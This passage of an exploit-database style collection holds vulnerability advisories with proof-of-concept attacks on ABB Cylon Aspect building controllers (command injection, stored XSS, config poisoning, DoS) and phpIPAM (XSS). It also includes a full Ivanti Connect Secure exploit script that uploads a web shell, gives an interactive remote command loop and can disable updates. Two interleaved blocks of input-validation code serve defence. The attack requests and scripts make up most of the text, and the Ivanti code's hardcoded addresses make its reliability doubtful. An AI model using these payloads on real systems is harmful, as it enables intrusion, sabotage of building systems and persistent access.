Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the contents of an uploaded .db file, which is passed to the copyFile.sh script. Although the filename is sanitized, the contents of the .db file are not, allowing attackers to inject malicious commands that are executed on the server.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2025-5904
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5904.php
CVE ID: CVE-2024-48839
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839

21.04.2024

--

$ curl -s http://192.168.73.31/uploadDb.php \
> -H "Cookie: PHPSESSID=xxx" \
> -F "userfile=@testingus.db"

$ curl http://192.168.73.31/database/testingus.db
-
ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting
ABB Cylon Aspect 3.08.02 (licenseUpload.php) Stored Cross-Site Scripting

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated stored cross-site scripting (XSS) vulnerability. This can be exploited by uploading a malicious .txt file containing an XSS payload, which is stored on the server and served back to users. Although the filename is sanitized via the filename POST parameter, the file contents are not inspected or sanitized, allowing attackers to inject arbitrary client-side scripts that execute in the context of any user accessing the infected file or related web page (license.php). To bypass file upload checks, the request must include the Variant string enabling the upload process for potential exploitation.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2025-5905
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5905.php
CVE ID: CVE-2024-6516
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516

21.04.2024

--

<html>
  <body>
    <script>
      function storeit() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.73.31\/licenseUpload.php", true);
        xhr.setRequestHeader("Accept-Language", "mk-MK,mk;q=0.7");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarymcNoKljWbBWAldlr");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" +
          "Content-Disposition: form-data; name=\"userfile\"; filename=\"test.txt\"\r\n" +
          "Content-Type: text/lic\r\n" +
          "\r\n" +
          "Variant = AspectMAX\r\n" +
          "\x3cscript\x3econfirm(251)\x3c/script\x3e\r\n" +
          "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" +
          "Content-Disposition: form-data; name=\"submit\"\r\n" +
          "\r\n" +
          "Upload\r\n" +
          "------WebKitFormBoundarymcNoKljWbBWAldlr--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
      storeit();
    </script>
    <form action="#">
      <input type="button" value="Post" onclick="storeit();" />
    </form>
  </body>
</html>
-
ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting
ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) Stored Cross-Site Scripting

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated stored cross-site scripting vulnerability. Input passed to the 'host' POST parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2025-5906
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5906.php
CVE ID: CVE-2024-6516
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516

21.04.2024

--

<html>
  <body>
    <form action="http://192.168.73.31/licenseServerUpdate.php" method="post">
      <input type="hidden" name="licenseServer" value="Server" />
      <input type="hidden" name="host" value="'><script>confirm(document.domain)</script>" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>
-
Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
# Exploit Title: Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
# Date: 2025-01-11
# Exploit Author: @absholi7ly
# CVE: CVE-2025-0282

import requests
import sys
import struct
import socket
import ssl
import urllib3
import time

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):
    payload = b"A" * offset  # Fill the buffer
    payload += struct.pack("<I", system_address)  # Overwrite return address with system()
    payload += b"BBBB"  # Fake return address
    payload += struct.pack("<I", command_address)  # Address of the command
    payload += command.encode()  # Command to execute
    return payload


def send_payload(target_ip, payload):
    try:
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)
        ssl_sock.connect((target_ip, 443))
        print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")
        exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
        http_request = (
            f"POST {exploit_endpoint} HTTP/1.1\r\n"
            f"Host: {target_ip}\r\n"
            f"Content-Length: {len(payload)}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"\r\n"
        ).encode() + payload
        ssl_sock.send(http_request)
        response = ssl_sock.recv(4096)
        ssl_sock.close()
        return response.decode(errors="replace")
    except Exception as e:
        print(f"[-] Error sending payload: {e}")
        return None


def exploit_vulnerability(target_ip, command):
    payload = create_exploit_payload(command)
    response = send_payload(target_ip, payload)
    if response:
        print("[+] Payload sent successfully.")
    else:
        print("[-] No response received.")


def upload_web_shell(target_ip, local_shell_path):
    try:
        with open(local_shell_path, "r") as f:
            web_shell_content = f.read()
        command = f"echo '{web_shell_content}' > /shell.php"
        exploit_vulnerability(target_ip, command)
        print("[+] Web shell uploaded successfully at /shell.php.")
        verify_shell(target_ip)
    except Exception as e:
        print(f"[-] Error uploading web shell: {e}")


def verify_shell(target_ip):
    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.get(shell_url, verify=False, timeout=10)
        if response.status_code == 200:
            print("[+] Web shell is accessible.")
        else:
            print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error verifying web shell: {e}")


def execute_shell_command(target_ip, command):
    shell_url = f"http://{target_ip}/shell.php"
    try:
        # Sending the command via POST
        response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
        if response.status_code == 200:
            print(f"[+] Command output:\n{response.text.strip()}")
        else:
            print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error executing command via web shell: {e}")


def disable_updates(target_ip):
    commands = [
        "systemctl stop apt-daily.service",
        "systemctl disable apt-daily.service"
    ]
    for command in commands:
        execute_shell_command(target_ip, command)
    print("[+] System updates disabled successfully.")


def main():
    if len(sys.argv) != 3:
        print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
        sys.exit(1)
    target_ip = sys.argv[1]
    local_shell_path = sys.argv[2]
    # Upload the web shell
    upload_web_shell(target_ip, local_shell_path)
    while True:
        command = input("Enter command to execute on the target (or 'exit' to quit): ")
        if command.lower() == "exit":
            print("Exiting...")
            break
        execute_shell_command(target_ip, command)


if __name__ == "__main__":
    main()
-
ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning
ABB Cylon Aspect 3.08.02 (webServerUpdate.php) Input Validation Config Poisoning

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from improper input validation on the port POST parameter in the webServerUpdate.php script. This input is not validated on the server side and relies on bypassable client-side checks using the inString.js script to verify that the port parameter contains only characters from the set (0123456789). Attackers can bypass these checks and supply arbitrary integer values. Exploitation of this issue can result in configuration poisoning, Denial of Service (DoS) through malformed configurations, or manipulation of server settings via Cross-Site Request Forgery (CSRF) combined with authentication bypass.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2025-5901
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5901.php

21.04.2024

--

$ curl http://192.168.73.31/webServerUpdate.php \
> -d "port=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" \
> -H "Cookie: PHPSESSID=xxx"

<html>
  <head>
    <title>The ABB Group</title>
    <link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
  </head>
  <body>
    <table border="0" cellpadding="0" cellspacing="0" class="workspace" bgcolor="#CCCCCC" width="100%">
      <tr>
        <td width="100%" valign="top">
          Web Server settings have been successfully updated.<br><br>Please go to <a href='//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/'>//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/</a> to continue.
        </td>
      </tr>
    </table>
    <iframe src="webServerUpdateRun.php" style="visibility:hidden;">
    </iframe>
  </body>
</html>
-
ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)
ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices.

Desc: A vulnerability was identified in a PHP script where an off-by-one error in array access could lead to undefined behavior and potential DoS. The issue arises in a loop that iterates over an array using a < condition, allowing access to an out-of-bounds index. This can trigger errors or unexpected behavior when processing data, potentially crashing the application. Successful exploitation of this vulnerability can lead to a crash or disruption of service, especially if the script handles large data sets. This issue can be triggered via the rowCount POST parameter in the Electronic Security Control device update script.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2025-5902
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5902.php
CVE ID: CVE-2024-48844
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48844

21.04.2024

--

$ curl http://192.168.73.31/escDevicesUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2511531337&\
> escid1=192.168.1.1&\
> remove1=0&\
> escid2=192.168.1.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&\
> remove2=0&\
> etc.
> etc.

$ cat escDevicesUpdate.php
...
...
$ini = INI::read($comproperties);
unset($ini['comm']['esc-ip-addr']);
$rowCount = $_POST['rowCount'];
for ($i = 1; $i < $rowCount; $i++) {
    $fieldEscid = "escid" . $i;
    $fieldRemove = "remove" . $i;
    if ($_POST[$fieldRemove] != 1) {
        $escid = trim($_POST[$fieldEscid]);
        $ini['comm']['esc-ip-addr'][$i] = $escid;
    }
}
if (!INI::write($comproperties, $ini)) {
    logWarning("ESC device listt modification FAILED");
    $myLine = __LINE__;
    errorCall($myLine);
}
...
-
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated blind command injection vulnerability. Input passed to several POST parameters is not properly sanitized when writing files, allowing attackers to execute arbitrary shell commands on the system. There is also an off-by-one error in array access that could lead to undefined behavior and potential DoS.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2025-5903
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
CVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839

21.04.2024

--

$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2&\
> ip1=192.168.1.1&\
> port1=47808&\
> hexMask1=0xFFFF&\
> remove1=0&\
> ip2=192.168.1.2&\
> port2=47809&\
> hexMask2=0xFFFF; sleep 17; #&\
> remove2=0&\
> submit=Submit

$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCountNAT=2&\
> NATip1=192.168.1.1&\
> NATport1=2222&\
> NAThexMask1=0xFFFF&\
> NATremove1=7&\
> NATip2=192.168.1.2&\
> NATport2=2223&\
> NAThexMask2=0xFFFF; sleep 17; #&\
> NATremove2=0&\
> submit=Submit
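The three ABB advisories above (webServerUpdate.php, escDevicesUpdate.php and bbmdUpdate.php) share one root cause: values the controller writes into its configuration or hands to shell helpers are checked only client-side, if at all. The following is an added example, not ABB's code, of the server-side validation a defender would want at that boundary; the function names, the `check` helper and the `MAX_ROWS` limit are assumptions, while the field names and the sample payloads are taken from the advisories.

```python
import ipaddress
import re

# Upper bound on rows a form may legitimately submit; a bound like this stops the
# rowCount=2511531337 loop from escDevicesUpdate.php before it starts. Assumed value.
MAX_ROWS = 64
# BACnet hex mask as it appears in the bbmdUpdate form: 0x followed by 1-4 hex digits.
HEX_MASK_RE = re.compile(r"^0x[0-9A-Fa-f]{1,4}$")


class ValidationError(ValueError):
    pass


def validate_port(value):
    """Server-side twin of the client-side inString.js digit check, but as a real
    TCP port range test rather than a character-set test."""
    if not isinstance(value, str) or not value.isdigit() or len(value) > 5:
        raise ValidationError(f"port must be 1-5 digits: {value!r}")
    port = int(value)
    if not 1 <= port <= 65535:
        raise ValidationError(f"port out of range: {port}")
    return port


def validate_row_count(value):
    if not isinstance(value, str) or not value.isdigit() or len(value) > 3:
        raise ValidationError(f"rowCount must be a small integer: {value!r}")
    n = int(value)
    if not 1 <= n <= MAX_ROWS:
        raise ValidationError(f"rowCount out of range: {n}")
    return n


def validate_ip(value):
    try:
        return str(ipaddress.IPv4Address(value.strip()))
    except (ipaddress.AddressValueError, AttributeError):
        raise ValidationError(f"not an IPv4 address: {value!r}")


def validate_hex_mask(value):
    """Only a bare hex literal is accepted, so a value such as the advisory's
    '0xFFFF; sleep 17; #' never reaches the file writer or a shell."""
    if not isinstance(value, str) or not HEX_MASK_RE.match(value):
        raise ValidationError(f"bad hex mask: {value!r}")
    return value.lower()


def validate_bbmd_rows(form, prefix=""):
    """Validate the rowCount/ipN/portN/hexMaskN/removeN parameter family.

    prefix is "" for the BBMD table and "NAT" for the NAT table, matching the two
    requests in the advisory. Rows 1..rowCount inclusive are all required (no
    off-by-one); rows flagged remove=1 are dropped, anything else is kept.
    """
    n = validate_row_count(form.get("rowCount" + prefix, ""))
    rows = []
    for i in range(1, n + 1):
        def field(name):
            key = f"{prefix}{name}{i}"
            if key not in form:
                raise ValidationError(f"missing field {key}")
            return form[key]
        if field("remove") == "1":
            continue
        rows.append({
            "ip": validate_ip(field("ip")),
            "port": validate_port(field("port")),
            "hexMask": validate_hex_mask(field("hexMask")),
        })
    return rows


def check(fn, *args):
    """Return (True, value) or (False, message); convenient for logging rejected input."""
    try:
        return True, fn(*args)
    except ValidationError as e:
        return False, str(e)
```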
-
phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
# Exploit Title: phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.5.1
# Tested on: Ubuntu, Windows
# CVE : CVE-2023-24657

PoC:

1) http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2) http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22

Sink: print @$_REQUEST['closeClass']
Vulnerable Variable: closeClass
Source: $_REQUEST['closeClass']
Sanitization Mechanisms Before Patch: None
Sink Context Constraints: Reflected within HTML attributes without escaping
Attack Payload: " onclick="alert(1)"
Execution Path Constraints: Directly accessed from the 'closeClass' parameter without modification
Request URL: http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22
Request Method: GET
Final PoC: http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22

[Replace Your Domain Name]
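The sink listed above prints `closeClass` straight into an HTML attribute, which is why both PoC URLs break out of it. As an added example (not phpIPAM's code, and written in Python rather than the PHP of the original sink), the functions below show the two server-side defences for that context: an allow-list for what a CSS class name may contain, and attribute-context encoding for cases where a free-form value must be echoed regardless. The regex, the `default` fallback and the anchor markup are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# A CSS class token as the popup would legitimately receive it: letters, digits, - and _.
CLASS_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def close_class_from_url(url):
    """Extract the decoded closeClass query value, or '' when absent."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("closeClass", [""])[0]


def safe_close_class(raw, default="close"):
    """Allow-list: anything outside the class-name alphabet falls back to the default.

    Preferable here because the parameter only ever needs to carry a class name,
    so there is no legitimate reason for quotes, angle brackets or spaces.
    """
    return raw if CLASS_RE.match(raw) else default


def render_close_button(raw):
    """Attribute-context encoding: quotes are encoded as well as < > &, so a
    payload can neither terminate the attribute nor add an event handler."""
    return f'<a class="{html.escape(raw, quote=True)}">close</a>'


def render_close_button_allowlisted(raw):
    """Both defences combined: allow-list first, encoding as belt and braces."""
    return f'<a class="{html.escape(safe_close_class(raw), quote=True)}">close</a>'
```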